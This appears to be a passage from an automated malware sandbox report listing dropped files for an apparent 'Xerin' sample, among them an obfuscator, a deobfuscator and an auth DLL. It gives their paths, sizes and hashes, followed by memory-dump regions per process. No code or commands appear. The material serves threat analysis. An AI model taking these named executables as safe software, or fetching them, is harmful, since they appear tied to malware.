e1496de704b21489642e9c2f4908889f42bcbf10

SHA256
ccc3947f54257accb39bc2e92aeca3e13e4e96c995682f1af8c3892b7fa2ba00

SHA512
ce664f4ab1e7f3d2bf65acbfa613cc4db3c4a7720ac71bd3432d9e6b2944c1c19fd81c453e8e6c33fe31efba90d370dedec4c9530737c2078982550a71b8dfaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\XerinJunk.exe
Filesize
426KB

MD5
16ef6975c3a2e7b86768238a5b6018b6

SHA1
f54dc4177eb5bbddaf66e26caa4151992512c47a

SHA256
1e7ab51a52876da677eb5d322831347902118ac65a77b7f80a8fc8c020756416

SHA512
bf60d10f78b8ce04b471b733f298c07a7da759a24e4811d7b6352aae533ff1ee37fd62387cff12e80245a7b9a1d28197e1cc114ab0a7124cf226486c92378fe9

Download Submit
C:\Users\Admin\Downloads\Xerin.rar
Filesize
8.2MB

MD5
34f0ba8a262fa353f023c00332f7d46c

SHA1
ee3510ba715a48887e6dad294402f64db68f2485

SHA256
a5de12a69cbf11e7558f43317c1cbfdd8eece3ad7c9b3b6e34db310704d3c337

SHA512
fb058649c3cda1b4d9982c23b7b5ac71582b0fda2dc7f32c809bd0e964432f3d7686f0b7d72f668db9a973e070b73344b27fe715fa8ee9f3e1846d5b52dbb799

Download Submit
C:\Users\Admin\Videos\Xerin\Data.txt
Filesize
30B

MD5
4eb99446804dd9182bba634b675f8820

SHA1
087c62695ff4ed06938e6435b5288a1a58f71fa9

SHA256
903423c6b5e691782e62f4c52abf2e4cbc3c8fa058d80c51e52afe96f63f80fd

SHA512
15168423762d476de5575ccedd6a9240cbc9cd5b07a0c5ad872de66d850532e65eaa8e58307ec08b597c6df9fa8d515194af3897e2ac41f20c4a9b5e5a817aea

Download Submit
C:\Users\Admin\Videos\Xerin\XAuth.dll
Filesize
161KB

MD5
c7d4a3ab07d02adc892e319bf3247fa4

SHA1
39100c0d278929fd287f18a4346ac69a0bfa5125

SHA256
4c8fb4e68ecb3e9ac2f9f24d99ead16413a125e7caa310662c28a68fd4f9818b

SHA512
f3a1207b1db42726b9542fbc7c434a02b1642f9d0f6599572f5a74136743898c45c25e94caad208c3a50cae86541ba94849d0603531060e8eabd059a69600934

Download Submit
C:\Users\Admin\Videos\Xerin\XerinFuscator.exe
Filesize
4.8MB

MD5
5a8bb4280a95729fab667f826792703b

SHA1
0139dbfa18441b79ccc87e082f05ff59e936d082

SHA256
a6d109aa0a175087a583536f8d1dba93cfde21e9f217ed41ef086ef3df74ca5d

SHA512
d770e2c639ddea88512d15a311933d31d54604d5343fa8957dee596393354565cb635ba26406d91c921b85afb8286dd0ad746654ae217db1d6b2c9e82d3a78fc

Download Submit
C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exe
Filesize
3.3MB

MD5
aa23d82fde63f355d4f01e12938f5ec7

SHA1
cf939269eab84173e1929c5eb24e4572716bace0

SHA256
ad4dd00078cf32233c55acfbc14d0f2af9ad5111ee8a8afd541767850779dabb

SHA512
f8fd652c8a36a8d34ff0c9c254f51df3dc8b6a3ccbbc5f5b1f30bb1ec37dec031e62b4007c8b89200099b8aab15244c4b417693c9d9cc7545ceabda50bd2f0e4

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_fsalf341.vip.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\pipe\LOCAL\crashpad_2668_TIKTKDCBHFYBCCFP
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/388-247-0x00007FFE03030000-0x00007FFE03040000-memory.dmp

Filesize
64KB

Download
memory/388-240-0x000001AC93D50000-0x000001AC93D7B000-memory.dmp

Filesize
172KB

Download
memory/388-246-0x000001AC93D50000-0x000001AC93D7B000-memory.dmp

Filesize
172KB

Download
memory/532-251-0x000001B1A6C60000-0x000001B1A6C8B000-memory.dmp

Filesize
172KB

Download
memory/616-205-0x00000212FB460000-0x00000212FB485000-memory.dmp

Filesize
148KB

Download
memory/616-207-0x00000212FB490000-0x00000212FB4BB000-memory.dmp

Filesize
172KB

Download
memory/616-213-0x00000212FB490000-0x00000212FB4BB000-memory.dmp

Filesize
172KB

Download
memory/616-214-0x00007FFE03030000-0x00007FFE03040000-memory.dmp

Filesize
64KB

Download
memory/616-206-0x00000212FB490000-0x00000212FB4BB000-memory.dmp

Filesize
172KB

Download
memory/672-224-0x0000013800850000-0x000001380087B000-memory.dmp

Filesize
172KB

Download
memory/672-225-0x00007FFE03030000-0x00007FFE03040000-memory.dmp

Filesize
64KB

Download
memory/672-218-0x0000013800850000-0x000001380087B000-memory.dmp

Filesize
172KB

Download
memory/960-235-0x0000016335A40000-0x0000016335A6B000-memory.dmp

Filesize
172KB

Download
memory/960-236-0x00007FFE03030000-0x00007FFE03040000-memory.dmp

Filesize
64KB

Download
memory/960-229-0x0000016335A40000-0x0000016335A6B000-memory.dmp

Filesize
172KB

Download
memory/2204-96-0x0000000000C60000-0x0000000000FBE000-memory.dmp

Filesize
3.4MB

Download
memory/3212-1066-0x0000000000F20000-0x00000000013EE000-memory.dmp

Filesize
4.8MB

Download
memory/5136-133-0x0000000000940000-0x00000000009E6000-memory.dmp

Filesize
664KB

Download
memory/5136-1000-0x0000000005680000-0x0000000005686000-memory.dmp

Filesize
24KB

Download
memory/5136-1082-0x0000000009B30000-0x0000000009B6C000-memory.dmp

Filesize
240KB

Download
memory/5136-1002-0x00000000056D0000-0x00000000056E2000-memory.dmp

Filesize
72KB

Download
memory/5136-996-0x000000000B2A0000-0x000000000B3E2000-memory.dmp

Filesize
1.3MB

Download
memory/5136-990-0x0000000005EA0000-0x0000000005EBA000-memory.dmp

Filesize
104KB

Download
memory/5136-134-0x0000000005460000-0x00000000055BE000-memory.dmp

Filesize
1.4MB

Download
memory/5136-188-0x0000000009C50000-0x0000000009E0C000-memory.dmp

Filesize
1.7MB

Download
memory/5136-187-0x0000000008AC0000-0x0000000008CD4000-memory.dmp

Filesize
2.1MB

Download
memory/5136-183-0x0000000008880000-0x000000000888A000-memory.dmp

Filesize
40KB

Download
memory/5136-989-0x00000000068A0000-0x000000000692E000-memory.dmp

Filesize
568KB

Download
memory/5136-168-0x0000000007030000-0x00000000070C2000-memory.dmp

Filesize
584KB

Download
memory/5136-172-0x0000000006F80000-0x0000000006FFA000-memory.dmp

Filesize
488KB

Download
memory/5136-135-0x00000000071A0000-0x0000000007744000-memory.dmp

Filesize
5.6MB

Download
memory/5136-161-0x0000000006E60000-0x0000000006E90000-memory.dmp

Filesize
192KB

Download
memory/5136-148-0x0000000007C20000-0x00000000080EE000-memory.dmp

Filesize
4.8MB

Download
memory/5284-132-0x0000000000AB0000-0x0000000000B20000-memory.dmp

Filesize
448KB

Download
memory/5564-166-0x0000000000E90000-0x0000000000F16000-memory.dmp

Filesize
536KB

Download
memory/5564-1116-0x000000001CD50000-0x000000001CD5A000-memory.dmp

Filesize
40KB

Download
memory/5564-167-0x0000000001860000-0x0000000001868000-memory.dmp

Filesize
32KB

Download
memory/5692-178-0x000001EAE6CD0000-0x000001EAE6CF2000-memory.dmp

Filesize
136KB

Download
memory/5692-189-0x000001EAE7060000-0x000001EAE708A000-memory.dmp

Filesize
168KB

Download
memory/5692-191-0x00007FFE41620000-0x00007FFE416DE000-memory.dmp

Filesize
760KB

Download
memory/5692-190-0x00007FFE42FB0000-0x00007FFE431A5000-memory.dmp

Filesize
2.0MB

Download
memory/5696-1042-0x0000000000890000-0x0000000000D5E000-memory.dmp

Filesize
4.8MB

Download
memory/5936-199-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5936-200-0x00007FFE42FB0000-0x00007FFE431A5000-memory.dmp

Filesize
2.0MB

Download
memory/5936-202-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5936-192-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5936-194-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5936-201-0x00007FFE41620000-0x00007FFE416DE000-memory.dmp

Filesize
760KB

Download
memory/5936-193-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5936-195-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download